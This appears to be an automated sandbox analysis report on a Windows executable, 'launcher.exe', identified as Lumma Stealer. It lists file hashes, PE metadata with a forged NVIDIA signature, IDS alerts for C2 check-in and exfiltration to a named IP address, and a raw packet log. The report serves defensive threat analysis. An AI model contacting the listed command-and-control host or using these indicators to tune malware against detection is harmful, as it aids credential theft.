Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Leside-.exe	Get hash	malicious	LummaC	Browse	104.21.58.80
	search.hta	Get hash	malicious	Unknown	Browse	104.21.58.80
	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.58.80
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.58.80
	@Setup.exe	Get hash	malicious	LummaC	Browse	104.21.58.80
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.58.80
	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.58.80
	0x001f00000004676d-1858.exe	Get hash	malicious	LummaC	Browse	104.21.58.80
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	104.21.58.80
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	104.21.58.80

Dropped Files

⊘No context

Created / dropped Files

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\launcher.exe
File Type:	assembler source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	14402
Entropy (8bit):	4.874636730022465
Encrypted:	false
SSDEEP:	384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
MD5:	DF0EFD0545733561C6E165770FB3661C
SHA1:	0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
SHA-256:	A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
SHA-512:	3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
Malicious:	false
Reputation:	low
Preview:	AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.557838087352951
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	launcher.exe
File size:	561'192 bytes
MD5:	7baf86e82d62f1d5c869d2213bc6d917
SHA1:	56f74a708d7aabb48a4ce88ce12e5ce21349e92c
SHA256:	513068d14f2e69b852712b380446a358211faadf6d345025954de638c2c83522
SHA512:	ca01354dfa604eb23ebec6ddda7eaf39c875386d765e711599f10692932bcbc26db927266cfc364d86af32ee044c530bb1547daf8f80c106a413d84501c45354
SSDEEP:	12288:oYO6Dqzihouxpa+yWutFACs1p8HugZo2lzYqowK0h9mVYuHy73FEO:tO6DThou2+yfCCsP8HFZVc6K0hKv03Ft
TLSH:	9BC4E0423690C4B2D95316774AB5D77A593EF9200F625AC7A3984BFECEB02C14F30A5E
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@.......................................@.................................\|j..<..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4104a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	96d90e8808da099bc17e050394f447e7

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/01/2023 19:00:00 16/01/2026 18:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
call 00007F74B9124B5Ah
jmp 00007F74B91249BDh
mov ecx, dword ptr [0043B680h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F74B9124B56h
test esi, ecx
jne 00007F74B9124B78h
call 00007F74B9124B81h
mov ecx, eax
cmp ecx, edi
jne 00007F74B9124B59h
mov ecx, BB40E64Fh
jmp 00007F74B9124B60h
test esi, ecx
jne 00007F74B9124B5Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [0043B680h], ecx
not ecx
pop edi
mov dword ptr [0043B6C0h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00436D00h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00436CB8h]
xor dword ptr [ebp-04h], eax
call dword ptr [00436CB4h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [00436D50h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 0043CF48h
call dword ptr [00436D28h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F74B912B933h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x36a7c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8c000	0x3fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x86a00	0x2628	.bss
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3f000	0x2744	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x32608	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ea98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x36c3c	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2b4ca	0x2b600	ebf84c6b836020b1a66433a898baeab7	False	0.5443702719740634	data	6.596404756541432	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2d000	0xc50c	0xc600	96e76e7ef084461591b1dcd4c2131f05	False	0.40260022095959597	data	4.741850626178578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3a000	0x3714	0x2800	d87fd4546a2b39263a028b496b33108f	False	0.29814453125	data	5.024681407682101	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x3e000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x3f000	0x2744	0x2800	c7508b57e36483307c47b7dd73fc0c85	False	0.75166015625	data	6.531416896423856	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x42000	0x49200	0x49200	9889029d643e09d4d4f26f8614e65826	False	1.0003372061965812	data	7.999391052036506	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x8c000	0x3fc	0x400	05b707b97d801ccd31a47ec3bf42267d	False	0.443359375	data	3.391431520369637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8c058	0x3a4	data	English	United States	0.44849785407725323

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

USER32.dll

ShowWindow

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T22:30:58.365194+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.58.80	443	TCP
2024-12-27T22:30:59.126737+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49708	104.21.58.80	443	TCP
2024-12-27T22:30:59.126737+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	104.21.58.80	443	TCP
2024-12-27T22:31:00.396793+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	104.21.58.80	443	TCP
2024-12-27T22:31:01.159733+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49709	104.21.58.80	443	TCP
2024-12-27T22:31:01.159733+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49709	104.21.58.80	443	TCP
2024-12-27T22:31:02.747756+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	104.21.58.80	443	TCP
2024-12-27T22:31:05.219651+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49711	104.21.58.80	443	TCP
2024-12-27T22:31:07.670895+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	104.21.58.80	443	TCP
2024-12-27T22:31:10.201530+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	104.21.58.80	443	TCP
2024-12-27T22:31:12.698465+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49714	104.21.58.80	443	TCP
2024-12-27T22:31:12.710714+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49714	104.21.58.80	443	TCP
2024-12-27T22:31:16.532548+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49718	104.21.58.80	443	TCP
2024-12-27T22:31:17.356671+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49718	104.21.58.80	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 22:30:57.145726919 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:57.145838976 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:57.145937920 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:57.147108078 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:57.147160053 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:58.365098953 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:58.365194082 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:58.370204926 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:58.370235920 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:58.370496035 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:58.412519932 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:58.412520885 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:58.412673950 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:59.126746893 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:59.126830101 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:59.126914978 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:59.128741980 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:59.128768921 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:59.128783941 CET	49708	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:59.128791094 CET	443	49708	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:59.137423038 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:59.137480021 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:30:59.137562990 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:59.137867928 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:30:59.137878895 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:00.396684885 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:00.396792889 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:00.398849964 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:00.398861885 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:00.399071932 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:00.400109053 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:00.400121927 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:00.400166988 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.159756899 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.159811974 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.159842014 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.159859896 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.159869909 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.159879923 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.159902096 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.159926891 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.159979105 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.159987926 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.168092966 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.168170929 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.168176889 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.176497936 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.176578999 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.176584959 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.227421045 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.227427959 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.274293900 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.279419899 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.321181059 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.360703945 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.364588022 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.364615917 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.364655018 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.364665985 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.364681005 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.364711046 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.364739895 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.364825964 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.364840031 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.364851952 CET	49709	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.364856958 CET	443	49709	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.484822989 CET	49710	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.484864950 CET	443	49710	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:01.484926939 CET	49710	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.485168934 CET	49710	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:01.485182047 CET	443	49710	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:02.747656107 CET	443	49710	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:02.747756004 CET	49710	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:02.748826981 CET	49710	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:02.748859882 CET	443	49710	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:02.749100924 CET	443	49710	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:02.750190020 CET	49710	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:02.750323057 CET	49710	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:02.750363111 CET	443	49710	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:03.794172049 CET	443	49710	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:03.794266939 CET	443	49710	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:03.794327974 CET	49710	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:03.794445038 CET	49710	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:03.794487000 CET	443	49710	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:03.958420038 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:03.958455086 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:03.958532095 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:03.958805084 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:03.958817005 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:05.219547987 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:05.219650984 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:05.220807076 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:05.220815897 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:05.221040964 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:05.224077940 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:05.224251032 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:05.224282026 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:05.224479914 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:05.271332979 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:06.222646952 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:06.222722054 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:06.222830057 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:06.223057032 CET	49711	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:06.223069906 CET	443	49711	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:06.413043022 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:06.413084030 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:06.413146973 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:06.413434982 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:06.413454056 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:07.670727968 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:07.670895100 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:07.672080040 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:07.672092915 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:07.672322989 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:07.673500061 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:07.673618078 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:07.673655033 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:07.673713923 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:07.673722982 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:08.636439085 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:08.636522055 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:08.636569977 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:08.636748075 CET	49712	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:08.636765957 CET	443	49712	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:08.985438108 CET	49713	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:08.985471010 CET	443	49713	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:08.985536098 CET	49713	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:08.985774994 CET	49713	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:08.985788107 CET	443	49713	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:10.201455116 CET	443	49713	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:10.201529980 CET	49713	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:10.202812910 CET	49713	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:10.202824116 CET	443	49713	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:10.203057051 CET	443	49713	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:10.204278946 CET	49713	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:10.204370975 CET	49713	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:10.204375982 CET	443	49713	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:10.996382952 CET	443	49713	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:10.996459961 CET	443	49713	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:10.996608973 CET	49713	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:10.996680975 CET	49713	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:10.996695042 CET	443	49713	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:11.393616915 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:11.393697023 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:11.393779039 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:11.394057989 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:11.394092083 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.698360920 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.698465109 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.699728966 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.699737072 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.699973106 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.709570885 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.710325956 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.710364103 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.710438967 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.710477114 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.710551023 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.710613012 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.710699081 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.710726023 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.710827112 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.710855007 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.710959911 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.710985899 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.710994959 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.711091995 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.711116076 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.755328894 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.755464077 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.755497932 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.755510092 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.803333044 CET	443	49714	104.21.58.80	192.168.2.5
Dec 27, 2024 22:31:12.803441048 CET	49714	443	192.168.2.5	104.21.58.80
Dec 27, 2024 22:31:12.803467989 CET	49714	443	192.168.2.5	104.21.58.80
